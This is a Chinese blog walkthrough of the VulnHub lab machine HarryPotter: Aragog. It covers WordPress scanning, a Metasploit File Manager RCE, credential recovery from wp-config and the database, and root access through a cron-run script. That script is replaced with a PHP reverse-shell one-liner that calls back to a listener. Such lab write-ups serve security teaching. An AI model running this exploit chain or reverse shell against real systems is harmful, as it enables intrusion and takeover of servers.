harrypotter1-aragog靶机攻略

这篇具有很好参考价值的文章主要介绍了harrypotter1-aragog靶机攻略。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

harrypotter1

扫描

nmap

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

指纹

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

目录

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

渗透

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

找到了登录位置

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

看到wordpress就用wpscan扫一扫

wpscan --url="http://10.4.7.153/blog" -e p --plugins-detection aggressive --api-token=d1fuMZc2tbhJWYk9VfNsl0GZlyYxkfH6bpL0pCKFhok

扫描出有这些file manager漏洞

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

使用msf搜一下这个漏洞

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

此处选择使用exploit/multi/http/wp_file_manager_rce

名字完全契合

配置完成后运行获取shell,注意要配置targeturi参数

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

使用该命令获取回显

/usr/bin/script -qc /bin/bash /dev/null

在hagrid98的家目录下发现疑似密码文件

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

解码结果如图

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

wordpress文件夹在etc下,进去看看发现config配置文件

得到数据库的用户信息

root:mySecr3tPass

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

登入数据库

mysql -uroot -p

在wordpress数据库的wp-users表中发现用户信息

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

hagrid98:$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

hash-identifier识别一下密码类型

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

拿去md5解密,得到

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

hagrid98:password123

提权

ssh连接登录成功

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

在/opt文件夹下发现脚本文件,查看内容,是将下载内容复制到tmp路径下,该脚本可能为一个定时执行的任务

将该脚本文件更改为如图内容

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

进入/tmp增加一个php文件,将下面反弹命令写入

<?php $sock=fsockopen("10.4.7.138",6789);exec("/bin/sh -i <&3 >&3 2>&3");?>

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

开启监听端口

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

等待一会提权成功

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全

获取第二个

harrypotter1-aragog靶机攻略,靶机系列,网络安全,安全,web安全文章来源地址https://www.toymoban.com/news/detail-720197.html

到了这里,关于harrypotter1-aragog靶机攻略的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • Vulnhub项目:Aragog

    Vulnhub项目:Aragog

    HarryPotter: Aragog (1.0.2) ~ VulnHub 死亡圣器三部曲之第一部,Aragog是海格养的蜘蛛的名字, 并且又牵扯到了密室 确定靶机ip,攻击机ip,扫描靶机开放端口  只有22,80端口,对80端口进行目录爆破,发现是wordpress框架  这里给了提示,说明是wordpress plugins存在一些可利用的点    查

    2024年02月10日
    浏览(11)
  • HARRYPOTTER: FAWKES

    HARRYPOTTER: FAWKES

    攻击机 目标机192.168.223.143 主机发现 端口扫描 开启了21 22 80 2222 9898 五个端口,其中21端口可以匿名FTP登录,好像有点说法,百度搜索一下发现可以用anonymous登录,尝试一下 ftp连接方式是ftp IP 可以看到有个server_hogwarts文件 get到本地 看一下是什么文件 vim打开文件头有一个ELF,应

    2024年02月19日
    浏览(10)
  • 通过python获取靶机的反弹Shell [靶机实战]

    通过python获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(14)
  • 通过nc获取靶机的反弹Shell [靶机实战]

    通过nc获取靶机的反弹Shell [靶机实战]

    Kali:172.30.1.3/24 靶机(Funbox9):172.30.1.129/24 通过nmap扫描此主机,我们需要获取到开放的端口以及服务的Banner  通过扫描我们发现,目标主机开放着21端口,服务Banner是 vsftpd 2.3.4,并且允许匿名登录 我们尝试ftp匿名连接此主机:  根据其返回信息,我们发现了一个可能是一个本

    2024年02月06日
    浏览(16)
  • 春秋云镜靶机

    春秋云镜靶机

    Subrion CMS 4.2.1 存在文件上传漏洞 flag{88ac8da5-e712-40fc-85c9-df7f8fb6a3e5} CuppaCMS是一套内容管理系统(CMS)。 CuppaCMS 2019-11-12之前版本存在安全漏洞,攻击者可利用该漏洞在图像扩展内上传恶意文件,通过使用文件管理器提供的重命名函数的自定义请求,可以将图像扩展修改为PHP,从

    2024年02月15日
    浏览(12)
  • lampiao靶机渗透测试

    lampiao靶机渗透测试

    一、前言         已经好久没有复习过主机渗透的相关知识了,上一次进行渗透的学习已经是4个月前了,本篇对lampiao靶机进行一下渗透测试。  二、信息采集  第一步先查看自身kali主机网段,ip为192.168.119.128,24位子网掩码。   接着使用下面的命令nmap扫描出靶机的ip为

    2024年02月13日
    浏览(11)
  • dc-6靶机

    dc-6靶机

    1.使用nmap进行信息搜集,存活主机,端口 192.168.85.184是存活主机,发现开放22,80端口 2.访问192.168.85.184的80端口 发现被重定向了,修改hosts文件 3.对网站进行信息搜集并进行相关利用 找到一段信息 主要是说插件安全的问题,估计利用wordpress插件的漏洞 访问http://192.168.85.184/

    2024年02月01日
    浏览(8)
  • 渗透测试 靶机环境下载

    实验环境 下载微软软件: Sign in to your account http://msdn.microsoft.com/en-ca/subscriptions/aa336858 下载实验所需Windows虚拟机: Virtual Machines - Microsoft Edge Developer Download free virtual machines to test Microsoft Edge and IE8 to IE11 https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下载Linux应用程序虚拟机

    2024年02月09日
    浏览(11)
  • vulnhub靶机Brainpan

    vulnhub靶机Brainpan

    主机发现 arp-scan -l 端口扫描 nmap --min-rate 10000 -p- 192.168.21.156 服务扫描 nmap -sV -sT -O -p9999,10000 192.168.21.156 这个地方感到了有点不对劲,python起来的一个web端口 漏洞扫描 nmap --script=vuln -p9999,10000 192.168.21.156 意料之中,先去看一下web的内容 这个就是一张图片,但是还是扫个目录看

    2024年02月09日
    浏览(11)
  • Vulnhub靶机:driftingblues 2

    Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(10)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包